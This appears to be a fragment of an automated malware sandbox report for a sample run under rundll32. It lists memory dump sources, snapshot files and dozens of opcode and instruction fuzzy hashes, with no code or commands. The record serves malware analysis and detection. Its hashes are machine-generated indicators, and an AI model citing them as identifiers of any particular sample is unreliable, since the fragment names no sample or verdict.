      • Opcode Fuzzy Hash: f6c7bea3175cfc294230f47d58ba1dfccdcd670ef459563e0909d5e87e22ef4b
      • Instruction Fuzzy Hash: B0B011E2B00000BEBA00CA208F28C3B23ACE320B22300082A3C00E0008C22C8C02C230

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.22960009314.00000000030E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_30e0000_rundll32.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: f18fb4789033bd6a9fde9bedef3c37d3305af639d180213a74387e95bf1014db
      • Instruction ID: 28155cd055f31bd19e0baa37ddad42c24046a10a46bf19a46dbf537abee94d42
      • Opcode Fuzzy Hash: f18fb4789033bd6a9fde9bedef3c37d3305af639d180213a74387e95bf1014db
      • Instruction Fuzzy Hash: 214121B5A012068FDB08DF98C5946AEFBF0FF88304F1485AED858AB351D375A885CF91
      • Instruction ID: 30a6610c39f7ad1bfffeb985cd3833c3012c42a735f1483b0b6311bca3a73759
      • Opcode Fuzzy Hash: b97912f7ceb2164d5fea7a62da57f858af12a3b602e8157fadf736327b70d52f
      • Instruction Fuzzy Hash: 12B18E71A18391DFD764CF29D981AAAF7E1FF84310F15892EE68987360D334E845CB92
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c2f55073d4d4b4a00a7bfc839cb92533cb18fb66c455d38ec64850cdcd8861fe
      • Instruction ID: 064e52b11893730b57f224e5283e7e537483902688259d9473f6103a4cf89d1f
      • Opcode Fuzzy Hash: c2f55073d4d4b4a00a7bfc839cb92533cb18fb66c455d38ec64850cdcd8861fe
      • Instruction Fuzzy Hash: 54B1E272A09381CFD77ACF24C5A0BAEBBE2BBC5310F15492ED58A57780DB706845CB52
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 57791ba4fa703636a29e9b042deb8d90916eb5631d2af1a11c1a6d401b67de20
      • Instruction ID: d67fac534781a0a0a1c5d365cebe2847c3cbdbd02bc011c1945772345f943bc9
      • Opcode Fuzzy Hash: 57791ba4fa703636a29e9b042deb8d90916eb5631d2af1a11c1a6d401b67de20
      • Instruction Fuzzy Hash: 01A13A71A082818FD768CF18C580BAFB7E3BFC5310F158A2DD5995B399D730A846CB92
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 82b4ce497332e4f3ce1fde20faec48073117c2e341840e822832d87dc79f2e07
      • Instruction ID: 8474845e08e097dc77405f57ba90fab7b0b5b416be361387e150b795f4a3d048
      • Opcode Fuzzy Hash: 82b4ce497332e4f3ce1fde20faec48073117c2e341840e822832d87dc79f2e07
      • Instruction Fuzzy Hash: 24A13C31A597518FE374CF15C990B6BB7A3BFC5305F24CA2DD58A0B258C774A806CB92
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: eb3c2d2f6fd0744f33eae13391b17db1a497e870171dc2d8f90fe8dd38b98f64
      • Instruction ID: 9046f0e76d0a121b0e0d0da251cf547b79ab9beb5807ce480e44494131375b41
      • Opcode Fuzzy Hash: eb3c2d2f6fd0744f33eae13391b17db1a497e870171dc2d8f90fe8dd38b98f64
      • Instruction Fuzzy Hash: 7BA16E366082518FE768DF64C580BABB7E2FFC4314F518A2DD899DB285D770E841CB92
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 742a2af83fde4a61208e0cc889197b8d2783517953528e9d25257f4ce3641b91
      • Instruction ID: 55b5683117be96d489db221394e6628f306262531d92d925bd78afb392e7e540
      • Opcode Fuzzy Hash: 742a2af83fde4a61208e0cc889197b8d2783517953528e9d25257f4ce3641b91
      • Instruction Fuzzy Hash: 57B1E271A08391CFC779CF14C1A0BAEF7E2BB98710F16892ED99A67350D7306845CB92
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2414d43e287a32ff3e9c598003533e5bdddead11bf7a184911e7305c1433411c
      • Instruction ID: 42af807fe660bb61cb5228b06fb5ee77684e645e60d81bcde3fe9da028e09ccf
      • Opcode Fuzzy Hash: 2414d43e287a32ff3e9c598003533e5bdddead11bf7a184911e7305c1433411c
      • Instruction Fuzzy Hash: 30B1E176A083918FCB39CF14C190BAEB7E1BF98311F11892DD9DA27644DB747845CB92
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4d1402daf8191c2404c3d1aa372133b264ae9bcbdc70fb84d5f937d6f0012d6d
      • Instruction ID: 8dee5b35dc266d9e15a5ea63908837ffeaa6f25f3a7074acd899793127ae635b
      • Opcode Fuzzy Hash: 4d1402daf8191c2404c3d1aa372133b264ae9bcbdc70fb84d5f937d6f0012d6d
      • Instruction Fuzzy Hash: 2DA13931A583828FE779CF54C5C0BAFB7A2BBC5340F148A2DD5C55728AD730A8468BD2
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1e772a36589d9a647609bb58d0ebdfd566c6d589dc0cd55b32a80c02ff4c2ee6
      • Instruction ID: a9b1a360af3c32b19537457317ce26ad69df63566c0d9decbbfe33a67328ccca
      • Opcode Fuzzy Hash: 1e772a36589d9a647609bb58d0ebdfd566c6d589dc0cd55b32a80c02ff4c2ee6
      • Instruction Fuzzy Hash: 81A1E471608381CFD724CF18C980BAABBE2BB84314F55892DE989DB365D770F8558B62
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ca4afc87a82569400eafadb98e8e1e2e4ff44802f2f5800c7cee4552990950bd
      • Instruction ID: f76ed5a53759d0f92660de7a75bb0f09e908a017d859ae4ccb632dc0e71ce8a4
      • Opcode Fuzzy Hash: ca4afc87a82569400eafadb98e8e1e2e4ff44802f2f5800c7cee4552990950bd
      • Instruction Fuzzy Hash: 5581B3739083608FD324CF24C84055BF7E2FBC8310F168A2DE995AB394D675AC06CB82
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6113fc816526c83596422f04f84afdefe6ba3b9ce3f17c25b5208e9331c82878
      • Instruction ID: 291416ea1f577e4cdc1012db99c4d21016ec9d54118f04dc0bf687445a52518a
      • Opcode Fuzzy Hash: 6113fc816526c83596422f04f84afdefe6ba3b9ce3f17c25b5208e9331c82878
      • Instruction Fuzzy Hash: DB71C772A187108BD758CE24D890A6FB7E7BBD5300F158A2DE9D597384E635A805CBC1
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8e52a20375883d495ddd89b764faee532e31b81173f62a405c1107a4294f1c39
      • Instruction ID: 877f30f73464a7570a52c100ff4578a6ec01fa52ca013d9dfd0a4580a65791ab
      • Opcode Fuzzy Hash: 8e52a20375883d495ddd89b764faee532e31b81173f62a405c1107a4294f1c39
      • Instruction Fuzzy Hash: AF61B232A08A019FD724CF29C88065BB7E3FBD8314F258A2DE59597394DB31F806CB81
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cf8d08c97e1ca6e7df2555279857dedb5b308484d399e442e8afb36f86954a87
      • Instruction ID: 90792f2aad78551cd7bec599fbc6ce3f276f021f222954ea9f9acbec6d336cba
      • Opcode Fuzzy Hash: cf8d08c97e1ca6e7df2555279857dedb5b308484d399e442e8afb36f86954a87
      • Instruction Fuzzy Hash: 41716C316083818FDB60CF29C991B5BBBE2BFC5314F198A18E594CB395DB30E885CB52
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5a0844c31b02a23a8198440acf42ade140c4ad9456d2f259d07d1ee3ea645849
      • Instruction ID: 660ff910d7c75a329a77ee8667f482b61164633642b8f00b5444dd2aa3ceac3b
      • Opcode Fuzzy Hash: 5a0844c31b02a23a8198440acf42ade140c4ad9456d2f259d07d1ee3ea645849
      • Instruction Fuzzy Hash: 09714971A183518FD768CF68C880B5BB7F1BF89320F158A2DE898D7795D734E8448B92
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ae710dcb7ec85a72f43ff532ae2ef2ce4d0bc3f6fd492ed3a2eb70d14c4eec96
      • Instruction ID: c5a206dfbe4f0b38312d3686f6364bd743f3d3039cecac15a040ee0ec331a765
      • Opcode Fuzzy Hash: ae710dcb7ec85a72f43ff532ae2ef2ce4d0bc3f6fd492ed3a2eb70d14c4eec96
      • Instruction Fuzzy Hash: F5711435A087528FD364CF28C590A5ABBE2BBC8700F148A1DE599DB354CB34E949CF92
      Memory Dump Source
      • Source File: 00000003.00000002.22961038338.0000000004E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E51000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4e51000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6c9072b87953168b5e62023a7992c03c23b7768ae1ff9504dfe0edbb8b67bddc
      • Instruction ID: 5b5c18a4d203de61229016b13eef2c2ea10f78cab7fc9663e91327ffff4508ac
      • Opcode Fuzzy Hash: 6c9072b87953168b5e62023a7992c03c23b7768ae1ff9504dfe0edbb8b67bddc
      • Instruction Fuzzy Hash: 4C519D36A083458FC710CF29D480A6AF7E6FBC9314F164959E9969B360E734F906CB91
      Memory Dump Source
      • Source File: 00000003.00000003.22555604072.00000000064D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 064D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_64d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7b65959f39060446ebc83eb71a341c719c49bfa59247352b208b80e4460ba291
      • Instruction ID: 92191cbf84c9c5c16a319910cafccc3863e622078f13a42b381a25892c79bc4a
      • Opcode Fuzzy Hash: 7b65959f39060446ebc83eb71a341c719c49bfa59247352b208b80e4460ba291
      • Instruction Fuzzy Hash: 92513C31A087808FD765CF25C590B9BBBE3AFC6714F148A1DD5D947359CB30A846CB82
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 83e520c9c14c22b107fe1247b979f55fca06ddb04bfa23f6c178df8430835192
      • Instruction ID: dffb056b5299756af04868f4193e46696b8d5d24ac4f73d01a628203a861bca7
      • Opcode Fuzzy Hash: 83e520c9c14c22b107fe1247b979f55fca06ddb04bfa23f6c178df8430835192
      • Instruction Fuzzy Hash: CE5157729086718BC724CF18C84026AFBE0BF85761F1A4A69ECD87B251D778BC41CBC2
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9ccecaab1c9449db6c3f228f2c9e4a468121ef4ca9810753cf88f56f473524e8
      • Instruction ID: fa748dae74b5d09d9c0304ae29cb67bfc73b47e96107d123f5ac032313f5efb0
      • Opcode Fuzzy Hash: 9ccecaab1c9449db6c3f228f2c9e4a468121ef4ca9810753cf88f56f473524e8
      • Instruction Fuzzy Hash: 28513A76A087508FD324CF24C88166AF7E2FBD9320F59492DE6969B350D734B946CF82
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 14579c35d9cbde739cc8360cc853f669c5923773700718879027475fc59e9fa9
      • Instruction ID: 6d75ba642a2dfd83fa7c7b2eb3e1e3cb66021f38319022dd8357e951d455bd9f
      • Opcode Fuzzy Hash: 14579c35d9cbde739cc8360cc853f669c5923773700718879027475fc59e9fa9
      • Instruction Fuzzy Hash: 80417A726187A18FC704CF28C45002EFBEABFCA710F1A4A5EE5959B350C671F945CB92
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bdc20c9261e43848c2ec5a882ac1bfb77c1b6c9e8568db960eace896f9fbafab
      • Instruction ID: e54626c9c8101641c964916a43e3d4cadf16892fc6664f54815730441b7be179
      • Opcode Fuzzy Hash: bdc20c9261e43848c2ec5a882ac1bfb77c1b6c9e8568db960eace896f9fbafab
      • Instruction Fuzzy Hash: 6041A1317082A18BC704CF29C49452FFBE2AFC9715F598A1DF4C59B294D678F805CB92
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 768aaa8313ca377a087b71db7dbdeccf79672e669432fb3722d5f80fe7f37d71
      • Instruction ID: 9980e924ed4dfb2ea965c642f110b7ecc4a998b6180316031eb1e94158fcde7a
      • Opcode Fuzzy Hash: 768aaa8313ca377a087b71db7dbdeccf79672e669432fb3722d5f80fe7f37d71
      • Instruction Fuzzy Hash: 3E317C729183508FD798CF2AC48001BF7E6BBD9310F1A8A2DE98497394E675E901CB92